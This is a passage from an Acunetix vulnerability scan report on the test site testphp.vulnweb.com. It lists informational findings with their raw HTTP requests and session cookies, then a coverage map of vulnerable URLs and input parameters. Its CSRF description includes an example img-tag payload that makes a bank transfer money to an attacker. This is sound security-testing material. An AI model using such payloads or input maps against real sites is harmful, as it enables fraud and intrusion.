GET /Connections/DB_Connection.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/secured/database_connect.php
Details
We found "access denied for user" "using password" -documentation
GET /secured/database_connect.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZP
Request headers
140Acunetix Website Audit
e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
141Acunetix Website Audit
Microsoft Office possible sensitive information
InformationalSeverity
InformationalType
Scripting (Text_Search_File.script)Reported by module
Description
This document has been converted to HTML using Microsoft Office. It seems that Office has included sensitiveinformation during the conversion.
Impact
Possible sensitive information disclosure that may help an attacker to conduct social engineering attacks.
Recommendation
Inspect the source code of this document and remove the sensitive information.
References
iMPERVA Source Code Disclosure
Affected items
/secured/office.htm
Details
Pattern found: <o:DocumentProperties> <o:Author>Acunetix</o:Author> <o:LastAuthor>Acunetix</o:LastAuthor> <o:Revision>1</o:Revision> <o:TotalTime>0</o:TotalTime> <o:Created>2005-04-05T11:44:00Z</o:Created> <o:LastSaved>2005-04-05T11:44:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>5</o:Words> <o:Characters>30</o:Characters> <o:Company>Acunetix</o:Company> <o:Lines>1</o:Lines> <o:Paragraphs>1</o:Paragraphs> <o:CharactersWithSpaces>34</o:CharactersWithSpaces> <o:Version>11.6360</o:Version> </o:DocumentProperties>
GET /secured/office.htm HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
142Acunetix Website Audit
Password type input with auto-complete enabled
InformationalSeverity
InformationalType
CrawlerReported by module
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the passwordshould be saved.Thereafter when the form is displayed, the name and password are filled in automatically or arecompleted as the name is entered. An attacker with local access could obtain the cleartext password from the browsercache.
Impact
Possible sensitive information disclosure.
Recommendation
The password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to: <INPUT TYPE="password" AUTOCOMPLETE="off">
Affected items
/login.php
Details
Password type input(s): pass from form named loginform with action userinfo.php have autocomplete enabled.
GET /login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Accept-Language: en-US,*
Host: testphp.vulnweb.com
Request headers
/login.php
Details
Password type input(s): pass from unnamed form with action search.php?test=query have autocomplete enabled.
GET /login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Accept-Language: en-US,*
Host: testphp.vulnweb.com
Request headers
143Acunetix Website Audit
Possible CSRF (Cross-site request forgery)
InformationalSeverity
ValidationType
CSRFReported by module
Description
Manual confirmation is required for this alert.This script is possibly vulnerable to cross-site request forgery. Cross Site Reference Forgery (CSRF/XSRF) is a class ofattack that affects web based applications with a predictable structure for invocation. An attacker tricks the user intoperforming an action of the attackers choosing by directing the victim's actions on the target application with a link orother content.The attack works by including a link or script in a page that accesses a site to which the user is known (or is supposed)to have authenticated. Here is an example: <img src="http://bank.example/withdraw?from=victim&amount=1000000&to=attacker">If the bank keeps authentication information in a cookie, and if the cookie hasn't expired, then victim's browser's attemptto load the image will submit the withdrawal form with his cookie. This vulnerability is also known by several other names including Session Riding and One-Click Attack.
Impact
Depends on implementation.
Recommendation
Insert custom random tokens into every form and URL that will not be automatically submitted by the browser. CheckReferences for detailed information on protecting against this vulnerability.
References
Cross Site Reference Forgery
Cross-Site Request Forgeries
The Cross-Site Request Forgery (CSRF/XSRF) FAQ
Cross-site request forgery
Top 10 2007-Cross Site Request Forgery
Affected items
/AJAX/infotitle.php
Details
No details are available.
POST /AJAX/infotitle.php HTTP/1.1
Referer: http://testphp.vulnweb.com/AJAX/index.php
Origin: http://testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
content-type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 4
Cookie: mycookie=3; login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept-Language: en-US,*
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
id=1
Request headers
144Acunetix Website Audit
Possible internal IP address disclosure
InformationalSeverity
InformationalType
Scripting (Text_Search_File.script)Reported by module
Description
A string matching an internal IPv4 address was found on this page. This may disclose information about the IPaddressing scheme of the internal network. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required.
Impact
Possible sensitive information disclosure.
Recommendation
Prevent this information from being displayed to the user.
Affected items
/404.php
Details
Pattern found: 192.168.0.28
GET /404.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/pictures/ipaddresses.txt
Details
Pattern found: 192.168.0.26
GET /pictures/ipaddresses.txt HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Request headers
145Acunetix Website Audit
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/secured/phpinfo.php
Details
Pattern found: 192.168.0.5
GET /secured/phpinfo.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
146Acunetix Website Audit
Possible server path disclosure (Unix)
InformationalSeverity
InformationalType
Scripting (Text_Search_File.script)Reported by module
Description
One or more fully qualified path names were found on this page. From this information the attacker may learn the filesystem structure from the web server. This information can be used to conduct further attacks. This alert may be a false positive, manual confirmation is required.
Impact
Possible sensitive information disclosure.
Recommendation
Prevent this information from being displayed to the user.
References
Full Path Disclosure
Affected items
/pictures/path-disclosure-unix.html
Details
Pattern found: /usr/local/etc/httpd/htdocs2/destination
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/secured/phpinfo.php
Details
Pattern found: /usr/obj/usr/src/sys/GENERIC
GET /secured/phpinfo.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Request headers
147Acunetix Website Audit
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
148Acunetix Website Audit
Possible username or password disclosure
InformationalSeverity
InformationalType
Scripting (Text_Search_File.script)Reported by module
Description
A username and/or password was found in this file. This information could be sensitive. This alert may be a false positive, manual confirmation is required.
Impact
Possible sensitive information disclosure.
Recommendation
Remove this file from your website or change its permissions to remove access.
Affected items
/Connections/DB_Connection.php
Details
Pattern found: password: NO
GET /Connections/DB_Connection.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/pictures/credentials.txt
Details
Pattern found: password=something
GET /pictures/credentials.txt HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
149Acunetix Website Audit
Accept: */*
/secured/database_connect.php
Details
Pattern found: password: NO
GET /secured/database_connect.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: aspectalerts
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
150Acunetix Website Audit
Scanned items (coverage report)
Scanned 129 URLs. Found 60 vulnerable.
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
Host HTTP Header
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/style.css
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/images/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/images/logo.gif
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/login.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/userinfo.php
17 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
pass URL encoded POST
uname URL encoded POST
Input scheme 2
Input name Input type
URL encoded POST
uaddress URL encoded POST
ucc URL encoded POST
uemail URL encoded POST
uphone URL encoded POST
urname URL encoded POST
Input scheme 3
Input name Input type
uname URL encoded POST
update URL encoded POST
Input scheme 4
Input name Input type
uaddress URL encoded POST
ucc URL encoded POST
uemail URL encoded POST
uname URL encoded POST
update URL encoded POST
uphone URL encoded POST
151Acunetix Website Audit
urname URL encoded POST
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/cart.php
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
del URL encoded GET
Input scheme 2
Input name Input type
del URL encoded GET
addcart URL encoded POST
Input scheme 3
Input name Input type
addcart URL encoded POST
price URL encoded POST
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/search.php
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
test URL encoded GET
URL encoded POST
searchFor URL encoded POST
Input scheme 2
Input name Input type
test URL encoded GET
searchFor URL encoded POST
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/hpp/
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
pp URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/hpp/params.php
6 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
URL encoded GET
Input scheme 2
Input name Input type
p URL encoded GET
pp URL encoded GET
Input scheme 3
Input name Input type
152Acunetix Website Audit
aaaa URL encoded GET
p URL encoded GET
pp URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/hpp/index.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
pp URL encoded GET
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/hpp/test.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/index.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/artists.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
artist URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/privacy.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/guestbook.php
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
name URL encoded POST
text URL encoded POST
Input scheme 2
Input name Input type
URL encoded POST
name URL encoded POST
text URL encoded POST
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/categories.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Flash/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Flash/add.swf
No input(s) found for this URL
153Acunetix Website Audit
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Flash/add.fla
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/index.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/styles.css
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/titles.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/artists.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/categories.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/showxml.php
5 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
text/xml Custom POST
xml.node#text XML
xml.node#text XML
xml.node:name XML
xml.node:name XML
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/infoartist.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/infocateg.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
154Acunetix Website Audit
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/infotitle.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded POST
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/AJAX/htaccess.conf
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/disclaimer.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php
1 input(s) found for this URL
Inputs
155Acunetix Website Audit
Input scheme 1
Input name Input type
id URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/signup.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/sendcommand.php
3 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
URL encoded POST
cart_id URL encoded POST
Input scheme 2
Input name Input type
cart_id URL encoded POST
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/listproducts.php
4 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
cat URL encoded GET
Input scheme 2
Input name Input type
artist URL encoded GET
Input scheme 3
Input name Input type
artist URL encoded GET
cat URL encoded GET
156Acunetix Website Audit
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/product.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
pic URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/showimage.php
3 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
file URL encoded GET
size URL encoded GET
Input scheme 2
Input name Input type
file URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/redir.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
r URL encoded GET
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Templates/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Templates/logout.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com:80/crossdomain.xml
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/newuser.php
10 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
URL encoded POST
uaddress URL encoded POST
157Acunetix Website Audit
ucc URL encoded POST
uemail URL encoded POST
upass URL encoded POST
upass2 URL encoded POST
uphone URL encoded POST
urname URL encoded POST
uuname URL encoded POST
Input scheme 2
Input name Input type
signup URL encoded POST
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/style.css
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/database_connect.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/index.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/office.htm
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/phpinfo.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
URL encoded GET
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/office_files
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/secured/office_files/filelist.xml
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/comment.php
17 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
aid URL encoded GET
Input scheme 2
Input name Input type
URL encoded POST
comment URL encoded POST
name URL encoded POST
phpaction URL encoded POST
158Acunetix Website Audit
Input scheme 3
Input name Input type
pid URL encoded GET
Input scheme 4
Input name Input type
aid URL encoded GET
pid URL encoded GET
Input scheme 5
Input name Input type
aid URL encoded GET
pid URL encoded GET
name URL encoded POST
Input scheme 6
Input name Input type
aid URL encoded GET
pid URL encoded GET
comment URL encoded POST
name URL encoded POST
phpaction URL encoded POST
Submit URL encoded POST
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/.name
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/acuart.iml
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/encodings.xml
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/misc.xml
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/modules.xml
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/scopes/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/vcs.xml
No input(s) found for this URL
159Acunetix Website Audit
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/.idea/workspace.xml
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/_mmServerScripts/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
Type URL encoded POST
